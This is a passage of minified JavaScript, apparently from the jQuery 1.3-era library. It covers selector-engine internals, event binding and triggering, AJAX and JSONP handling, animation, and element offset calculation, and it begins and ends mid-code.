T=document.createElement("div");T.appendChild(document.createComment(""));if(T.getElementsByTagName("*").length>0){I.find.TAG=function(U,Y){var X=Y.getElementsByTagName(U[1]);if(U[1]==="*"){var W=[];for(var V=0;X[V];V++){if(X[V].nodeType===1){W.push(X[V])}}X=W}return X}}T.innerHTML="<a href='#'></a>";if(T.firstChild&&typeof T.firstChild.getAttribute!=="undefined"&&T.firstChild.getAttribute("href")!=="#"){I.attrHandle.href=function(U){return U.getAttribute("href",2)}}})();if(document.querySelectorAll){(function(){var T=F,U=document.createElement("div");U.innerHTML="<p class='TEST'></p>";if(U.querySelectorAll&&U.querySelectorAll(".TEST").length===0){return}F=function(Y,X,V,W){X=X||document;if(!W&&X.nodeType===9&&!Q(X)){try{return E(X.querySelectorAll(Y),V)}catch(Z){}}return T(Y,X,V,W)};F.find=T.find;F.filter=T.filter;F.selectors=T.selectors;F.matches=T.matches})()}if(document.getElementsByClassName&&document.documentElement.getElementsByClassName){(function(){var T=document.createElement("div");T.innerHTML="<div class='test e'></div><div class='test'></div>";if(T.getElementsByClassName("e").length===0){return}T.lastChild.className="e";if(T.getElementsByClassName("e").length===1){return}I.order.splice(1,0,"CLASS");I.find.CLASS=function(U,V,W){if(typeof V.getElementsByClassName!=="undefined"&&!W){return V.getElementsByClassName(U[1])}}})()}function P(U,Z,Y,ad,aa,ac){var ab=U=="previousSibling"&&!ac;for(var W=0,V=ad.length;W<V;W++){var T=ad[W];if(T){if(ab&&T.nodeType===1){T.sizcache=Y;T.sizset=W}T=T[U];var X=false;while(T){if(T.sizcache===Y){X=ad[T.sizset];break}if(T.nodeType===1&&!ac){T.sizcache=Y;T.sizset=W}if(T.nodeName===Z){X=T;break}T=T[U]}ad[W]=X}}}function S(U,Z,Y,ad,aa,ac){var ab=U=="previousSibling"&&!ac;for(var W=0,V=ad.length;W<V;W++){var T=ad[W];if(T){if(ab&&T.nodeType===1){T.sizcache=Y;T.sizset=W}T=T[U];var X=false;while(T){if(T.sizcache===Y){X=ad[T.sizset];break}if(T.nodeType===1){if(!ac){T.sizcache=Y;T.sizset=W}if(typeof Z!=="string"){if(T===Z){X=true;break}}else{if(F.filter(Z,[T]).length>0){X=T;break}}}T=T[U]}ad[W]=X}}}var K=document.compareDocumentPosition?function(U,T){return U.compareDocumentPosition(T)&16}:function(U,T){return U!==T&&(U.contains?U.contains(T):true)};var Q=function(T){return T.nodeType===9&&T.documentElement.nodeName!=="HTML"||!!T.ownerDocument&&Q(T.ownerDocument)};var J=function(T,aa){var W=[],X="",Y,V=aa.nodeType?[aa]:aa;while((Y=I.match.PSEUDO.exec(T))){X+=Y[0];T=T.replace(I.match.PSEUDO,"")}T=I.relative[T]?T+"*":T;for(var Z=0,U=V.length;Z<U;Z++){F(T,V[Z],W)}return F.filter(X,W)};o.find=F;o.filter=F.filter;o.expr=F.selectors;o.expr[":"]=o.expr.filters;F.selectors.filters.hidden=function(T){return T.offsetWidth===0||T.offsetHeight===0};F.selectors.filters.visible=function(T){return T.offsetWidth>0||T.offsetHeight>0};F.selectors.filters.animated=function(T){return o.grep(o.timers,function(U){return T===U.elem}).length};o.multiFilter=function(V,T,U){if(U){V=":not("+V+")"}return F.matches(V,T)};o.dir=function(V,U){var T=[],W=V[U];while(W&&W!=document){if(W.nodeType==1){T.push(W)}W=W[U]}return T};o.nth=function(X,T,V,W){T=T||1;var U=0;for(;X;X=X[V]){if(X.nodeType==1&&++U==T){break}}return X};o.sibling=function(V,U){var T=[];for(;V;V=V.nextSibling){if(V.nodeType==1&&V!=U){T.push(V)}}return T};return;l.Sizzle=F})();o.event={add:function(I,F,H,K){if(I.nodeType==3||I.nodeType==8){return}if(I.setInterval&&I!=l){I=l}if(!H.guid){H.guid=this.guid++}if(K!==g){var G=H;H=this.proxy(G);H.data=K}var E=o.data(I,"events")||o.data(I,"events",{}),J=o.data(I,"handle")||o.data(I,"handle",function(){return typeof o!=="undefined"&&!o.event.triggered?o.event.handle.apply(arguments.callee.elem,arguments):g});J.elem=I;o.each(F.split(/\s+/),function(M,N){var O=N.split(".");N=O.shift();H.type=O.slice().sort().join(".");var L=E[N];if(o.event.specialAll[N]){o.event.specialAll[N].setup.call(I,K,O)}if(!L){L=E[N]={};if(!o.event.special[N]||o.event.special[N].setup.call(I,K,O)===false){if(I.addEventListener){I.addEventListener(N,J,false)}else{if(I.attachEvent){I.attachEvent("on"+N,J)}}}}L[H.guid]=H;o.event.global[N]=true});I=null},guid:1,global:{},remove:function(K,H,J){if(K.nodeType==3||K.nodeType==8){return}var G=o.data(K,"events"),F,E;if(G){if(H===g||(typeof H==="string"&&H.charAt(0)==".")){for(var I in G){this.remove(K,I+(H||""))}}else{if(H.type){J=H.handler;H=H.type}o.each(H.split(/\s+/),function(M,O){var Q=O.split(".");O=Q.shift();var N=RegExp("(^|\\.)"+Q.slice().sort().join(".*\\.")+"(\\.|$)");if(G[O]){if(J){delete G[O][J.guid]}else{for(var P in G[O]){if(N.test(G[O][P].type)){delete G[O][P]}}}if(o.event.specialAll[O]){o.event.specialAll[O].teardown.call(K,Q)}for(F in G[O]){break}if(!F){if(!o.event.special[O]||o.event.special[O].teardown.call(K,Q)===false){if(K.removeEventListener){K.removeEventListener(O,o.data(K,"handle"),false)}else{if(K.detachEvent){K.detachEvent("on"+O,o.data(K,"handle"))}}}F=null;delete G[O]}}})}for(F in G){break}if(!F){var L=o.data(K,"handle");if(L){L.elem=null}o.removeData(K,"events");o.removeData(K,"handle")}}},trigger:function(I,K,H,E){var G=I.type||I;if(!E){I=typeof I==="object"?I[h]?I:o.extend(o.Event(G),I):o.Event(G);if(G.indexOf("!")>=0){I.type=G=G.slice(0,-1);I.exclusive=true}if(!H){I.stopPropagation();if(this.global[G]){o.each(o.cache,function(){if(this.events&&this.events[G]){o.event.trigger(I,K,this.handle.elem)}})}}if(!H||H.nodeType==3||H.nodeType==8){return g}I.result=g;I.target=H;K=o.makeArray(K);K.unshift(I)}I.currentTarget=H;var J=o.data(H,"handle");if(J){J.apply(H,K)}if((!H[G]||(o.nodeName(H,"a")&&G=="click"))&&H["on"+G]&&H["on"+G].apply(H,K)===false){I.result=false}if(!E&&H[G]&&!I.isDefaultPrevented()&&!(o.nodeName(H,"a")&&G=="click")){this.triggered=true;try{H[G]()}catch(L){}}this.triggered=false;if(!I.isPropagationStopped()){var F=H.parentNode||H.ownerDocument;if(F){o.event.trigger(I,K,F,true)}}},handle:function(K){var J,E;K=arguments[0]=o.event.fix(K||l.event);K.currentTarget=this;var L=K.type.split(".");K.type=L.shift();J=!L.length&&!K.exclusive;var I=RegExp("(^|\\.)"+L.slice().sort().join(".*\\.")+"(\\.|$)");E=(o.data(this,"events")||{})[K.type];for(var G in E){var H=E[G];if(J||I.test(H.type)){K.handler=H;K.data=H.data;var F=H.apply(this,arguments);if(F!==g){K.result=F;if(F===false){K.preventDefault();K.stopPropagation()}}if(K.isImmediatePropagationStopped()){break}}}},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode metaKey newValue originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),fix:function(H){if(H[h]){return H}var F=H;H=o.Event(F);for(var G=this.props.length,J;G;){J=this.props[--G];H[J]=F[J]}if(!H.target){H.target=H.srcElement||document}if(H.target.nodeType==3){H.target=H.target.parentNode}if(!H.relatedTarget&&H.fromElement){H.relatedTarget=H.fromElement==H.target?H.toElement:H.fromElement}if(H.pageX==null&&H.clientX!=null){var I=document.documentElement,E=document.body;H.pageX=H.clientX+(I&&I.scrollLeft||E&&E.scrollLeft||0)-(I.clientLeft||0);H.pageY=H.clientY+(I&&I.scrollTop||E&&E.scrollTop||0)-(I.clientTop||0)}if(!H.which&&((H.charCode||H.charCode===0)?H.charCode:H.keyCode)){H.which=H.charCode||H.keyCode}if(!H.metaKey&&H.ctrlKey){H.metaKey=H.ctrlKey}if(!H.which&&H.button){H.which=(H.button&1?1:(H.button&2?3:(H.button&4?2:0)))}return H},proxy:function(F,E){E=E||function(){return F.apply(this,arguments)};E.guid=F.guid=F.guid||E.guid||this.guid++;return E},special:{ready:{setup:B,teardown:function(){}}},specialAll:{live:{setup:function(E,F){o.event.add(this,F[0],c)},teardown:function(G){if(G.length){var E=0,F=RegExp("(^|\\.)"+G[0]+"(\\.|$)");o.each((o.data(this,"events").live||{}),function(){if(F.test(this.type)){E++}});if(E<1){o.event.remove(this,G[0],c)}}}}}};o.Event=function(E){if(!this.preventDefault){return new o.Event(E)}if(E&&E.type){this.originalEvent=E;this.type=E.type}else{this.type=E}this.timeStamp=e();this[h]=true};function k(){return false}function u(){return true}o.Event.prototype={preventDefault:function(){this.isDefaultPrevented=u;var E=this.originalEvent;if(!E){return}if(E.preventDefault){E.preventDefault()}E.returnValue=false},stopPropagation:function(){this.isPropagationStopped=u;var E=this.originalEvent;if(!E){return}if(E.stopPropagation){E.stopPropagation()}E.cancelBubble=true},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=u;this.stopPropagation()},isDefaultPrevented:k,isPropagationStopped:k,isImmediatePropagationStopped:k};var a=function(F){var E=F.relatedTarget;while(E&&E!=this){try{E=E.parentNode}catch(G){E=this}}if(E!=this){F.type=F.data;o.event.handle.apply(this,arguments)}};o.each({mouseover:"mouseenter",mouseout:"mouseleave"},function(F,E){o.event.special[E]={setup:function(){o.event.add(this,F,a,E)},teardown:function(){o.event.remove(this,F,a)}}});o.fn.extend({bind:function(F,G,E){return F=="unload"?this.one(F,G,E):this.each(function(){o.event.add(this,F,E||G,E&&G)})},one:function(G,H,F){var E=o.event.proxy(F||H,function(I){o(this).unbind(I,E);return(F||H).apply(this,arguments)});return this.each(function(){o.event.add(this,G,E,F&&H)})},unbind:function(F,E){return this.each(function(){o.event.remove(this,F,E)})},trigger:function(E,F){return this.each(function(){o.event.trigger(E,F,this)})},triggerHandler:function(E,G){if(this[0]){var F=o.Event(E);F.preventDefault();F.stopPropagation();o.event.trigger(F,G,this[0]);return F.result}},toggle:function(G){var E=arguments,F=1;while(F<E.length){o.event.proxy(G,E[F++])}return this.click(o.event.proxy(G,function(H){this.lastToggle=(this.lastToggle||0)%F;H.preventDefault();return E[this.lastToggle++].apply(this,arguments)||false}))},hover:function(E,F){return this.mouseenter(E).mouseleave(F)},ready:function(E){B();if(o.isReady){E.call(document,o)}else{o.readyList.push(E)}return this},live:function(G,F){var E=o.event.proxy(F);E.guid+=this.selector+G;o(document).bind(i(G,this.selector),this.selector,E);return this},die:function(F,E){o(document).unbind(i(F,this.selector),E?{guid:E.guid+this.selector+F}:null);return this}});function c(H){var E=RegExp("(^|\\.)"+H.type+"(\\.|$)"),G=true,F=[];o.each(o.data(this,"events").live||[],function(I,J){if(E.test(J.type)){var K=o(H.target).closest(J.data)[0];if(K){F.push({elem:K,fn:J})}}});F.sort(function(J,I){return o.data(J.elem,"closest")-o.data(I.elem,"closest")});o.each(F,function(){if(this.fn.call(this.elem,H,this.fn.data)===false){return(G=false)}});return G}function i(F,E){return["live",F,E.replace(/\./g,"`").replace(/ /g,"|")].join(".")}o.extend({isReady:false,readyList:[],ready:function(){if(!o.isReady){o.isReady=true;if(o.readyList){o.each(o.readyList,function(){this.call(document,o)});o.readyList=null}o(document).triggerHandler("ready")}}});var x=false;function B(){if(x){return}x=true;if(document.addEventListener){document.addEventListener("DOMContentLoaded",function(){document.removeEventListener("DOMContentLoaded",arguments.callee,false);o.ready()},false)}else{if(document.attachEvent){document.attachEvent("onreadystatechange",function(){if(document.readyState==="complete"){document.detachEvent("onreadystatechange",arguments.callee);o.ready()}});if(document.documentElement.doScroll&&l==l.top){(function(){if(o.isReady){return}try{document.documentElement.doScroll("left")}catch(E){setTimeout(arguments.callee,0);return}o.ready()})()}}}o.event.add(l,"load",o.ready)}o.each(("blur,focus,load,resize,scroll,unload,click,dblclick,mousedown,mouseup,mousemove,mouseover,mouseout,mouseenter,mouseleave,change,select,submit,keydown,keypress,keyup,error").split(","),function(F,E){o.fn[E]=function(G){return G?this.bind(E,G):this.trigger(E)}});o(l).bind("unload",function(){for(var E in o.cache){if(E!=1&&o.cache[E].handle){o.event.remove(o.cache[E].handle.elem)}}});(function(){o.support={};var F=document.documentElement,G=document.createElement("script"),K=document.createElement("div"),J="script"+(new Date).getTime();K.style.display="none";K.innerHTML='   <link/><table></table><a href="/a" style="color:red;float:left;opacity:.5;">a</a><select><option>text</option></select><object><param/></object>';var H=K.getElementsByTagName("*"),E=K.getElementsByTagName("a")[0];if(!H||!H.length||!E){return}o.support={leadingWhitespace:K.firstChild.nodeType==3,tbody:!K.getElementsByTagName("tbody").length,objectAll:!!K.getElementsByTagName("object")[0].getElementsByTagName("*").length,htmlSerialize:!!K.getElementsByTagName("link").length,style:/red/.test(E.getAttribute("style")),hrefNormalized:E.getAttribute("href")==="/a",opacity:E.style.opacity==="0.5",cssFloat:!!E.style.cssFloat,scriptEval:false,noCloneEvent:true,boxModel:null};G.type="text/javascript";try{G.appendChild(document.createTextNode("window."+J+"=1;"))}catch(I){}F.insertBefore(G,F.firstChild);if(l[J]){o.support.scriptEval=true;delete l[J]}F.removeChild(G);if(K.attachEvent&&K.fireEvent){K.attachEvent("onclick",function(){o.support.noCloneEvent=false;K.detachEvent("onclick",arguments.callee)});K.cloneNode(true).fireEvent("onclick")}o(function(){var L=document.createElement("div");L.style.width=L.style.paddingLeft="1px";document.body.appendChild(L);o.boxModel=o.support.boxModel=L.offsetWidth===2;document.body.removeChild(L).style.display="none"})})();var w=o.support.cssFloat?"cssFloat":"styleFloat";o.props={"for":"htmlFor","class":"className","float":w,cssFloat:w,styleFloat:w,readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",tabindex:"tabIndex"};o.fn.extend({_load:o.fn.load,load:function(G,J,K){if(typeof G!=="string"){return this._load(G)}var I=G.indexOf(" ");if(I>=0){var E=G.slice(I,G.length);G=G.slice(0,I)}var H="GET";if(J){if(o.isFunction(J)){K=J;J=null}else{if(typeof J==="object"){J=o.param(J);H="POST"}}}var F=this;o.ajax({url:G,type:H,dataType:"html",data:J,complete:function(M,L){if(L=="success"||L=="notmodified"){F.html(E?o("<div/>").append(M.responseText.replace(/<script(.|\s)*?\/script>/g,"")).find(E):M.responseText)}if(K){F.each(K,[M.responseText,L,M])}}});return this},serialize:function(){return o.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?o.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||/select|textarea/i.test(this.nodeName)||/text|hidden|password|search/i.test(this.type))}).map(function(E,F){var G=o(this).val();return G==null?null:o.isArray(G)?o.map(G,function(I,H){return{name:F.name,value:I}}):{name:F.name,value:G}}).get()}});o.each("ajaxStart,ajaxStop,ajaxComplete,ajaxError,ajaxSuccess,ajaxSend".split(","),function(E,F){o.fn[F]=function(G){return this.bind(F,G)}});var r=e();o.extend({get:function(E,G,H,F){if(o.isFunction(G)){H=G;G=null}return o.ajax({type:"GET",url:E,data:G,success:H,dataType:F})},getScript:function(E,F){return o.get(E,null,F,"script")},getJSON:function(E,F,G){return o.get(E,F,G,"json")},post:function(E,G,H,F){if(o.isFunction(G)){H=G;G={}}return o.ajax({type:"POST",url:E,data:G,success:H,dataType:F})},ajaxSetup:function(E){o.extend(o.ajaxSettings,E)},ajaxSettings:{url:location.href,global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:function(){return l.ActiveXObject?new ActiveXObject("Microsoft.XMLHTTP"):new XMLHttpRequest()},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},ajax:function(M){M=o.extend(true,M,o.extend(true,{},o.ajaxSettings,M));var W,F=/=\?(&|$)/g,R,V,G=M.type.toUpperCase();if(M.data&&M.processData&&typeof M.data!=="string"){M.data=o.param(M.data)}if(M.dataType=="jsonp"){if(G=="GET"){if(!M.url.match(F)){M.url+=(M.url.match(/\?/)?"&":"?")+(M.jsonp||"callback")+"=?"}}else{if(!M.data||!M.data.match(F)){M.data=(M.data?M.data+"&":"")+(M.jsonp||"callback")+"=?"}}M.dataType="json"}if(M.dataType=="json"&&(M.data&&M.data.match(F)||M.url.match(F))){W="jsonp"+r++;if(M.data){M.data=(M.data+"").replace(F,"="+W+"$1")}M.url=M.url.replace(F,"="+W+"$1");M.dataType="script";l[W]=function(X){V=X;I();L();l[W]=g;try{delete l[W]}catch(Y){}if(H){H.removeChild(T)}}}if(M.dataType=="script"&&M.cache==null){M.cache=false}if(M.cache===false&&G=="GET"){var E=e();var U=M.url.replace(/(\?|&)_=.*?(&|$)/,"$1_="+E+"$2");M.url=U+((U==M.url)?(M.url.match(/\?/)?"&":"?")+"_="+E:"")}if(M.data&&G=="GET"){M.url+=(M.url.match(/\?/)?"&":"?")+M.data;M.data=null}if(M.global&&!o.active++){o.event.trigger("ajaxStart")}var Q=/^(\w+:)?\/\/([^\/?#]+)/.exec(M.url);if(M.dataType=="script"&&G=="GET"&&Q&&(Q[1]&&Q[1]!=location.protocol||Q[2]!=location.host)){var H=document.getElementsByTagName("head")[0];var T=document.createElement("script");T.src=M.url;if(M.scriptCharset){T.charset=M.scriptCharset}if(!W){var O=false;T.onload=T.onreadystatechange=function(){if(!O&&(!this.readyState||this.readyState=="loaded"||this.readyState=="complete")){O=true;I();L();T.onload=T.onreadystatechange=null;H.removeChild(T)}}}H.appendChild(T);return g}var K=false;var J=M.xhr();if(M.username){J.open(G,M.url,M.async,M.username,M.password)}else{J.open(G,M.url,M.async)}try{if(M.data){J.setRequestHeader("Content-Type",M.contentType)}if(M.ifModified){J.setRequestHeader("If-Modified-Since",o.lastModified[M.url]||"Thu, 01 Jan 1970 00:00:00 GMT")}J.setRequestHeader("X-Requested-With","XMLHttpRequest");J.setRequestHeader("Accept",M.dataType&&M.accepts[M.dataType]?M.accepts[M.dataType]+", */*":M.accepts._default)}catch(S){}if(M.beforeSend&&M.beforeSend(J,M)===false){if(M.global&&!--o.active){o.event.trigger("ajaxStop")}J.abort();return false}if(M.global){o.event.trigger("ajaxSend",[J,M])}var N=function(X){if(J.readyState==0){if(P){clearInterval(P);P=null;if(M.global&&!--o.active){o.event.trigger("ajaxStop")}}}else{if(!K&&J&&(J.readyState==4||X=="timeout")){K=true;if(P){clearInterval(P);P=null}R=X=="timeout"?"timeout":!o.httpSuccess(J)?"error":M.ifModified&&o.httpNotModified(J,M.url)?"notmodified":"success";if(R=="success"){try{V=o.httpData(J,M.dataType,M)}catch(Z){R="parsererror"}}if(R=="success"){var Y;try{Y=J.getResponseHeader("Last-Modified")}catch(Z){}if(M.ifModified&&Y){o.lastModified[M.url]=Y}if(!W){I()}}else{o.handleError(M,J,R)}L();if(X){J.abort()}if(M.async){J=null}}}};if(M.async){var P=setInterval(N,13);if(M.timeout>0){setTimeout(function(){if(J&&!K){N("timeout")}},M.timeout)}}try{J.send(M.data)}catch(S){o.handleError(M,J,null,S)}if(!M.async){N()}function I(){if(M.success){M.success(V,R)}if(M.global){o.event.trigger("ajaxSuccess",[J,M])}}function L(){if(M.complete){M.complete(J,R)}if(M.global){o.event.trigger("ajaxComplete",[J,M])}if(M.global&&!--o.active){o.event.trigger("ajaxStop")}}return J},handleError:function(F,H,E,G){if(F.error){F.error(H,E,G)}if(F.global){o.event.trigger("ajaxError",[H,F,G])}},active:0,httpSuccess:function(F){try{return!F.status&&location.protocol=="file:"||(F.status>=200&&F.status<300)||F.status==304||F.status==1223}catch(E){}return false},httpNotModified:function(G,E){try{var H=G.getResponseHeader("Last-Modified");return G.status==304||H==o.lastModified[E]}catch(F){}return false},httpData:function(J,H,G){var F=J.getResponseHeader("content-type"),E=H=="xml"||!H&&F&&F.indexOf("xml")>=0,I=E?J.responseXML:J.responseText;if(E&&I.documentElement.tagName=="parsererror"){throw"parsererror"}if(G&&G.dataFilter){I=G.dataFilter(I,H)}if(typeof I==="string"){if(H=="script"){o.globalEval(I)}if(H=="json"){I=l["eval"]("("+I+")")}}return I},param:function(E){var G=[];function H(I,J){G[G.length]=encodeURIComponent(I)+"="+encodeURIComponent(J)}if(o.isArray(E)||E.jquery){o.each(E,function(){H(this.name,this.value)})}else{for(var F in E){if(o.isArray(E[F])){o.each(E[F],function(){H(F,this)})}else{H(F,o.isFunction(E[F])?E[F]():E[F])}}}return G.join("&").replace(/%20/g,"+")}});var m={},n,d=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];function t(F,E){var G={};o.each(d.concat.apply([],d.slice(0,E)),function(){G[this]=F});return G}o.fn.extend({show:function(J,L){if(J){return this.animate(t("show",3),J,L)}else{for(var H=0,F=this.length;H<F;H++){var E=o.data(this[H],"olddisplay");this[H].style.display=E||"";if(o.css(this[H],"display")==="none"){var G=this[H].tagName,K;if(m[G]){K=m[G]}else{var I=o("<"+G+" />").appendTo("body");K=I.css("display");if(K==="none"){K="block"}I.remove();m[G]=K}o.data(this[H],"olddisplay",K)}}for(var H=0,F=this.length;H<F;H++){this[H].style.display=o.data(this[H],"olddisplay")||""}return this}},hide:function(H,I){if(H){return this.animate(t("hide",3),H,I)}else{for(var G=0,F=this.length;G<F;G++){var E=o.data(this[G],"olddisplay");if(!E&&E!=="none"){o.data(this[G],"olddisplay",o.css(this[G],"display"))}}for(var G=0,F=this.length;G<F;G++){this[G].style.display="none"}return this}},_toggle:o.fn.toggle,toggle:function(G,F){var E=typeof G==="boolean";return o.isFunction(G)&&o.isFunction(F)?this._toggle.apply(this,arguments):G==null||E?this.each(function(){var H=E?G:o(this).is(":hidden");o(this)[H?"show":"hide"]()}):this.animate(t("toggle",3),G,F)},fadeTo:function(E,G,F){return this.animate({opacity:G},E,F)},animate:function(I,F,H,G){var E=o.speed(F,H,G);return this[E.queue===false?"each":"queue"](function(){var K=o.extend({},E),M,L=this.nodeType==1&&o(this).is(":hidden"),J=this;for(M in I){if(I[M]=="hide"&&L||I[M]=="show"&&!L){return K.complete.call(this)}if((M=="height"||M=="width")&&this.style){K.display=o.css(this,"display");K.overflow=this.style.overflow}}if(K.overflow!=null){this.style.overflow="hidden"}K.curAnim=o.extend({},I);o.each(I,function(O,S){var R=new o.fx(J,K,O);if(/toggle|show|hide/.test(S)){R[S=="toggle"?L?"show":"hide":S](I)}else{var Q=S.toString().match(/^([+-]=)?([\d+-.]+)(.*)$/),T=R.cur(true)||0;if(Q){var N=parseFloat(Q[2]),P=Q[3]||"px";if(P!="px"){J.style[O]=(N||1)+P;T=((N||1)/R.cur(true))*T;J.style[O]=T+P}if(Q[1]){N=((Q[1]=="-="?-1:1)*N)+T}R.custom(T,N,P)}else{R.custom(T,S,"")}}});return true})},stop:function(F,E){var G=o.timers;if(F){this.queue([])}this.each(function(){for(var H=G.length-1;H>=0;H--){if(G[H].elem==this){if(E){G[H](true)}G.splice(H,1)}}});if(!E){this.dequeue()}return this}});o.each({slideDown:t("show",1),slideUp:t("hide",1),slideToggle:t("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(E,F){o.fn[E]=function(G,H){return this.animate(F,G,H)}});o.extend({speed:function(G,H,F){var E=typeof G==="object"?G:{complete:F||!F&&H||o.isFunction(G)&&G,duration:G,easing:F&&H||H&&!o.isFunction(H)&&H};E.duration=o.fx.off?0:typeof E.duration==="number"?E.duration:o.fx.speeds[E.duration]||o.fx.speeds._default;E.old=E.complete;E.complete=function(){if(E.queue!==false){o(this).dequeue()}if(o.isFunction(E.old)){E.old.call(this)}};return E},easing:{linear:function(G,H,E,F){return E+F*G},swing:function(G,H,E,F){return((-Math.cos(G*Math.PI)/2)+0.5)*F+E}},timers:[],fx:function(F,E,G){this.options=E;this.elem=F;this.prop=G;if(!E.orig){E.orig={}}}});o.fx.prototype={update:function(){if(this.options.step){this.options.step.call(this.elem,this.now,this)}(o.fx.step[this.prop]||o.fx.step._default)(this);if((this.prop=="height"||this.prop=="width")&&this.elem.style){this.elem.style.display="block"}},cur:function(F){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null)){return this.elem[this.prop]}var E=parseFloat(o.css(this.elem,this.prop,F));return E&&E>-10000?E:parseFloat(o.curCSS(this.elem,this.prop))||0},custom:function(I,H,G){this.startTime=e();this.start=I;this.end=H;this.unit=G||this.unit||"px";this.now=this.start;this.pos=this.state=0;var E=this;function F(J){return E.step(J)}F.elem=this.elem;if(F()&&o.timers.push(F)&&!n){n=setInterval(function(){var K=o.timers;for(var J=0;J<K.length;J++){if(!K[J]()){K.splice(J--,1)}}if(!K.length){clearInterval(n);n=g}},13)}},show:function(){this.options.orig[this.prop]=o.attr(this.elem.style,this.prop);this.options.show=true;this.custom(this.prop=="width"||this.prop=="height"?1:0,this.cur());o(this.elem).show()},hide:function(){this.options.orig[this.prop]=o.attr(this.elem.style,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(H){var G=e();if(H||G>=this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;var E=true;for(var F in this.options.curAnim){if(this.options.curAnim[F]!==true){E=false}}if(E){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;this.elem.style.display=this.options.display;if(o.css(this.elem,"display")=="none"){this.elem.style.display="block"}}if(this.options.hide){o(this.elem).hide()}if(this.options.hide||this.options.show){for(var I in this.options.curAnim){o.attr(this.elem.style,I,this.options.orig[I])}}this.options.complete.call(this.elem)}return false}else{var J=G-this.startTime;this.state=J/this.options.duration;this.pos=o.easing[this.options.easing||(o.easing.swing?"swing":"linear")](this.state,J,0,1,this.options.duration);this.now=this.start+((this.end-this.start)*this.pos);this.update()}return true}};o.extend(o.fx,{speeds:{slow:600,fast:200,_default:400},step:{opacity:function(E){o.attr(E.elem.style,"opacity",E.now)},_default:function(E){if(E.elem.style&&E.elem.style[E.prop]!=null){E.elem.style[E.prop]=E.now+E.unit}else{E.elem[E.prop]=E.now}}}});if(document.documentElement.getBoundingClientRect){o.fn.offset=function(){if(!this[0]){return{top:0,left:0}}if(this[0]===this[0].ownerDocument.body){return o.offset.bodyOffset(this[0])}var G=this[0].getBoundingClientRect(),J=this[0].ownerDocument,F=J.body,E=J.documentElement,L=E.clientTop||F.clientTop||0,K=E.clientLeft||F.clientLeft||0,I=G.top+(self.pageYOffset||o.boxModel&&E.scrollTop||F.scrollTop)-L,H=G.left+(self.pageXOffset||o.boxModel&&E.scrollLeft||F.scrollLeft)-K;return{top:I,left:H}}}else{o.fn.offset=function(){if(!this[0]){return{top:0,left:0}}if(this[0]===this[0].ownerDocument.body){return o.offset.bodyOffset(this[0])}o.offset.initialized||o.offset.initialize();var J=this[0],G=J.offsetParent,F=J,O=J.ownerDocument,M,H=O.documentElement,K=O.body,L=O.defaultView,E=L.getComputedStyle(J,null),N=J.offsetTop,I=J.offsetLeft;while((J=J.parentNode)&&J!==K&&J!==H){M=L.getComputedStyle(J,null);N-=J.scrollTop,I-=J.scrollLeft;if(J===G){N+=J.offsetTop,I+=J.offsetLeft;if(o.offset.doesNotAddBorder&&!(o.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(J.tagName))){N+=parseInt(M.borderTopWidth,10)||0,I+=parseInt(M.borderLeftWidth,10)||0}F=G,G=J.offsetParent}if(o.offset.subtractsBorderForOverflowNotVisible&&M.overflow!=="visible"){N+=parseInt(M.borderTopWidth,10)||0,I+=parseInt(M.borderLeftWidth,10)||0}E=M}if(E.position==="relative"||E.position==="static"){N+=K.offsetTop,I+=K.offsetLeft}if(E.position==="fixed"){N+=Math.max(H.scrollTop,K.scrollTop),I+=Math.max(H.scrollLeft,K.scrollLeft)}return{top:N,left:I}}}o.offset={initialize:function(){if(this.initialized){return}var L=document.body,F=document.createElement("div"),H,G,N,I,M,E,J=L.style.marginTop,K='<div style="position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;"><div></div></div><table style="position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;" cellpadding="0" cellspacing="0"><tr><td></td></tr></table>';M={position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"};for(E in M){F.style[E]=M[E]}F.innerHTML=K;L.insertBefore(F,L.firstChild);H=F.firstChild,G=H.firstChild,I=H.nextSibling.firstChild.firstChild;this.doesNotAddBorder=(G.offsetTop!==5);this.doesAddBorderForTableAndCells=(I.offsetTop===5);H.style.overflow="hidden",H.style.position="relative";this.subtractsBorderForOverflowNotVisible=(G.offsetTop===-5);L.style.marginTop="1px";this.doesNotIncludeMarginInBodyOffset=(L.offsetTop===0);L.style.marginTop=J;L.removeChild(F);this.initialized=true},bodyOffset:function(E){o.offset.initialized||o.offset.initialize();var G=E.offsetTop,F=E.offsetLeft;if(o.offset.doesNotIncludeMarginInBodyOffset){G+=parseInt(o.curCSS(E,"marginTop",true),10)||0,F+=parseInt(o.curCSS(E,"marginLeft",true),10)||0}return{top:G,left:F}}};o.fn.extend({position:function(){var I=0,H=0,F;if(this[0]){var G=this.offsetParent(),J=this.offset(),E=/^body|html$/i.test(G[0].tagName)?{top:0,left:0}:G.offset();J.top-=j(this,"marginTop");J.left-=j(this,"marginLeft");E.top+=j(G,"borderTopWidth");E.left+=j(G,"borderLeftWidth");F={top:J.top-E.top,left:J.left-E.left}}return F},offsetParent:function(){var E=this[0].offsetParent||document.body;while(E&&(!/^body|html$/i.test(E.tagName)&&o.css(E,"position")=="static")){E=E.offsetParent}return o(E)}});o.each(["Left","Top"],function(F,E){var 